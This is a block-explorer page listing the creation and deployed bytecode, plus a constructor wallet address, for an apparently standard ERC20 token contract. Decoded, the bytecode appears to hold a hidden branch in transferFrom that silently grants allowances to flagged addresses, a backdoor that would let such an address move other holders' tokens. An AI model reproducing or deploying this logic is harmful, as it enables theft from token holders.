9050809150509392505050565b505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610c7e576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c75906111bd565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610ced576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ce49061124f565b60405180910390fd5b6000811115610d785780600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505b505050565b6000610d8984846105ef565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8114610e035781811015610df5576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610dec906114e2565b60405180910390fd5b610e02848484840361067e565b5b50505050565b600081519050919050565b600082825260208201905092915050565b60005b83811015610e43578082015181840152602081019050610e28565b60008484015250505050565b6000601f19601f8301169050919050565b6000610e6b82610e09565b610e758185610e14565b9350610e85818560208601610e25565b610e8e81610e4f565b840191505092915050565b60006020820190508181036000830152610eb38184610e60565b905092915050565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000610eeb82610ec0565b9050919050565b610efb81610ee0565b8114610f0657600080fd5b50565b600081359050610f1881610ef2565b92915050565b6000819050919050565b610f3181610f1e565b8114610f3c57600080fd5b50565b600081359050610f4e81610f28565b92915050565b60008060408385031215610f6b57610f6a610ebb565b5b6000610f7985828601610f09565b9250506020610f8a85828601610f3f565b9150509250929050565b60008115159050919050565b610fa981610f94565b82525050565b6000602082019050610fc46000830184610fa0565b92915050565b610fd381610f1e565b82525050565b6000602082019050610fee6000830184610fca565b92915050565b60008060006060848603121561100d5761100c610ebb565b5b600061101b86828701610f09565b935050602061102c86828701610f09565b925050604061103d86828701610f3f565b9150509250925092565b600060ff82169050919050565b61105d81611047565b82525050565b60006020820190506110786000830184611054565b92915050565b60006020828403121561109457611093610ebb565b5b60006110a284828501610f09565b91505092915050565b600080604083850312156110c2576110c1610ebb565b5b60006110d085828601610f09565b92505060206110e185828601610f09565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000600282049050600182168061113257607f821691505b602082108103611145576111446110eb565b5b50919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b60006111a7602483610e14565b91506111b28261114b565b604082019050919050565b600060208201905081810360008301526111d68161119a565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b6000611239602283610e14565b9150611244826111dd565b604082019050919050565b600060208201905081810360008301526112688161122c565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b60006112cb602583610e14565b91506112d68261126f565b604082019050919050565b600060208201905081810360008301526112fa816112be565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b600061135d602383610e14565b915061136882611301565b604082019050919050565b6000602082019050818103600083015261138c81611350565b9050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60006113cd82610f1e565b91506113d883610f1e565b92508282019050808211156113f0576113ef611393565b5b92915050565b7f536166654d6174683a206164646974696f6e206f766572666c6f770000000000600082015250565b600061142c601b83610e14565b9150611437826113f6565b602082019050919050565b6000602082019050818103600083015261145b8161141f565b9050919050565b600061146d82610f1e565b915061147883610f1e565b92508282039050818111156114905761148f611393565b5b92915050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000600082015250565b60006114cc601d83610e14565b91506114d782611496565b602082019050919050565b600060208201905081810360008301526114fb816114bf565b905091905056fe45524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e636545524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726fa2646970667358221220b22a844f7edfd939a2e0babd4661020407a91b650180388e86df43d919b80a2f64736f6c634300081c00330000000000000000000000008e348b9d22bb07bf671e5cf9e8debb2257967d53
Deployed Bytecode
0x608060405234801561001057600080fd5b50600436106100a95760003560e01c80633950935111610071578063395093511461016857806370a082311461019857806395d89b41146101c8578063a457c2d7146101e6578063a9059cbb14610216578063dd62ed3e14610246576100a9565b806306fdde03146100ae578063095ea7b3146100cc57806318160ddd146100fc57806323b872dd1461011a578063313ce5671461014a575b600080fd5b6100b6610276565b6040516100c39190610e99565b60405180910390f35b6100e660048036038101906100e19190610f54565b610308565b6040516100f39190610faf565b60405180910390f35b610104610326565b6040516101119190610fd9565b60405180910390f35b610134600480360381019061012f9190610ff4565b610330565b6040516101419190610faf565b60405180910390f35b610152610360565b60405161015f9190611063565b60405180910390f35b610182600480360381019061017d9190610f54565b610377565b60405161018f9190610faf565b60405180910390f35b6101b260048036038101906101ad919061107e565b61042a565b6040516101bf9190610fd9565b60405180910390f35b6101d0610472565b6040516101dd9190610e99565b60405180910390f35b61020060048036038101906101fb9190610f54565b610504565b60405161020d9190610faf565b60405180910390f35b610230600480360381019061022b9190610f54565b6105d1565b60405161023d9190610faf565b60405180910390f35b610260600480360381019061025b91906110ab565b6105ef565b60405161026d9190610fd9565b60405180910390f35b6060600380546102859061111a565b80601f01602080910402602001604051908101604052809291908181526020018280546102b19061111a565b80156102fe5780601f106102d3576101008083540402835291602001916102fe565b820191906000526020600020905b8154815290600101906020018083116102e157829003601f168201915b5050505050905090565b600061031c610315610676565b848461067e565b6001905092915050565b6000600254905090565b600061033d848484610847565b6000610347610676565b9050610354858285610ada565b60019150509392505050565b6000600560009054906101000a900460ff16905090565b6000610420610384610676565b8461041b8560016000610395610676565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610b4890919063ffffffff16565b61067e565b6001905092915050565b60008060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6060600480546104819061111a565b80601f01602080910402602001604051908101604052809291908181526020018280546104ad9061111a565b80156104fa5780601f106104cf576101008083540402835291602001916104fa565b820191906000526020600020905b8154815290600101906020018083116104dd57829003601f168201915b5050505050905090565b60006105c7610511610676565b846105c285604051806060016040528060258152602001611529602591396001600061053b610676565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008a73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610ba69092919063ffffffff16565b61067e565b6001905092915050565b60006105e56105de610676565b8484610847565b6001905092915050565b6000600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036106ed576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016106e4906111bd565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160361075c576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016107539061124f565b60405180910390fd5b80600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b9258360405161083a9190610fd9565b60405180910390a3505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036108b6576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016108ad906112e1565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610925576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161091c90611373565b60405180910390fd5b610930838383610c0a565b61099b81604051806060016040528060268152602001611503602691396000808773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610ba69092919063ffffffff16565b6000808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550610a2e816000808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610b4890919063ffffffff16565b6000808473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051610acd9190610fd9565b60405180910390a3505050565b600660008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1615610b3857610b37838383610c0f565b5b610b43838383610d7d565b505050565b6000808284610b5791906113c2565b905083811015610b9c576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b9390611442565b60405180910390fd5b8091505092915050565b6000838311158290610bee576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610be59190610e99565b60405180910390fd5b5060008385610bfd9190611462565b9050809150509392505050565b505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610c7e576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c75906111bd565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610ced576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ce49061124f565b60405180910390fd5b6000811115610d785780600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505b505050565b6000610d8984846105ef565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8114610e035781811015610df5576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610dec906114e2565b60405180910390fd5b610e02848484840361067e565b5b50505050565b600081519050919050565b600082825260208201905092915050565b60005b83811015610e43578082015181840152602081019050610e28565b60008484015250505050565b6000601f19601f8301169050919050565b6000610e6b82610e09565b610e758185610e14565b9350610e85818560208601610e25565b610e8e81610e4f565b840191505092915050565b60006020820190508181036000830152610eb38184610e60565b905092915050565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000610eeb82610ec0565b9050919050565b610efb81610ee0565b8114610f0657600080fd5b50565b600081359050610f1881610ef2565b92915050565b6000819050919050565b610f3181610f1e565b8114610f3c57600080fd5b50565b600081359050610f4e81610f28565b92915050565b60008060408385031215610f6b57610f6a610ebb565b5b6000610f7985828601610f09565b9250506020610f8a85828601610f3f565b9150509250929050565b60008115159050919050565b610fa981610f94565b82525050565b6000602082019050610fc46000830184610fa0565b92915050565b610fd381610f1e565b82525050565b6000602082019050610fee6000830184610fca565b92915050565b60008060006060848603121561100d5761100c610ebb565b5b600061101b86828701610f09565b935050602061102c86828701610f09565b925050604061103d86828701610f3f565b9150509250925092565b600060ff82169050919050565b61105d81611047565b82525050565b60006020820190506110786000830184611054565b92915050565b60006020828403121561109457611093610ebb565b5b60006110a284828501610f09565b91505092915050565b600080604083850312156110c2576110c1610ebb565b5b60006110d085828601610f09565b92505060206110e185828601610f09565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000600282049050600182168061113257607f821691505b602082108103611145576111446110eb565b5b50919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b60006111a7602483610e14565b91506111b28261114b565b604082019050919050565b600060208201905081810360008301526111d68161119a565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b6000611239602283610e14565b9150611244826111dd565b604082019050919050565b600060208201905081810360008301526112688161122c565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b60006112cb602583610e14565b91506112d68261126f565b604082019050919050565b600060208201905081810360008301526112fa816112be565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b600061135d602383610e14565b915061136882611301565b604082019050919050565b6000602082019050818103600083015261138c81611350565b9050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60006113cd82610f1e565b91506113d883610f1e565b92508282019050808211156113f0576113ef611393565b5b92915050565b7f536166654d6174683a206164646974696f6e206f766572666c6f770000000000600082015250565b600061142c601b83610e14565b9150611437826113f6565b602082019050919050565b6000602082019050818103600083015261145b8161141f565b9050919050565b600061146d82610f1e565b915061147883610f1e565b92508282039050818111156114905761148f611393565b5b92915050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000600082015250565b60006114cc601d83610e14565b91506114d782611496565b602082019050919050565b600060208201905081810360008301526114fb816114bf565b905091905056fe45524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e636545524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726fa2646970667358221220b22a844f7edfd939a2e0babd4661020407a91b650180388e86df43d919b80a2f64736f6c634300081c0033
Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)
0000000000000000000000008e348b9d22bb07bf671e5cf9e8debb2257967d53
-----Decoded View---------------
Arg [0] : wallet_ (address): 0x8e348b9D22bB07BF671e5cF9E8dEbB2257967d53
-----Encoded View---------------
1 Constructor Arguments found :
Arg [0] : 0000000000000000000000008e348b9d22bb07bf671e5cf9e8debb2257967d53
Loading...
Loading
Loading...
Loading
Loading...
Loading
Net Worth in USD
$0.00
Net Worth in ETH
0
Multichain Portfolio | 35 Chains
| Chain | Token | Portfolio % | Price | Amount | Value |
|---|
Loading...
Loading
Loading...
Loading
Loading...
Loading
[ Download: CSV Export ]
A contract address hosts a smart contract, which is a set of code stored on the blockchain that runs when predetermined conditions are met. Learn more about addresses in our Knowledge Base.